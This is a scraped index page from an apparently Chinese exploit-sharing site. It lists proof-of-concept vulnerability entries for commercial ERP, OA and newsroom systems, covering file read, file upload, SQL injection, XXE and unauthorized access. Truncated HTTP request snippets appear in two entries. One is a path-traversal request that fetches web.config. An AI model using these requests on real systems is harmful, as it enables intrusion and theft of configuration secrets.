POC 第49页
【通用】 方正畅享全媒体新闻采编系统 UserSelect.do未授权访问漏洞_秃兔安全

【通用】 方正畅享全媒体新闻采编系统 UserSelect.do未授权访问漏洞

fofa语句yakit插件 uuidpocyakit && nuclei yaml已验证   
【通用】满客宝后台管理系统 downLoadStockInFile  任意文件读取_秃兔安全
天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞_秃兔安全

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01286
万户ezoffice wpsservlet任意文件上传_秃兔安全
致远 OA fileUpload.do 前台文件上传绕过漏洞_秃兔安全
【通用】CVE-2025-4524 Madara_秃兔安全

【通用】CVE-2025-4524 Madara

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
0715
【2025特殊通用】用友NC ActivityNotice_export sqli_秃兔安全

【2025特殊通用】用友NC ActivityNotice_export sqli

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
0755
【通用】朗速ERP FileUploadApi.ashx 存在任意文件上传_秃兔安全

【通用】朗速ERP FileUploadApi.ashx 存在任意文件上传

fofa语句yakit 插件 uuidpocnuclei yaml已验证   
【2025特殊通用】【通用】扁鹊飞救智能急救与质控系统 YZGH XXE_秃兔安全
福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞_秃兔安全

福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞

POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01275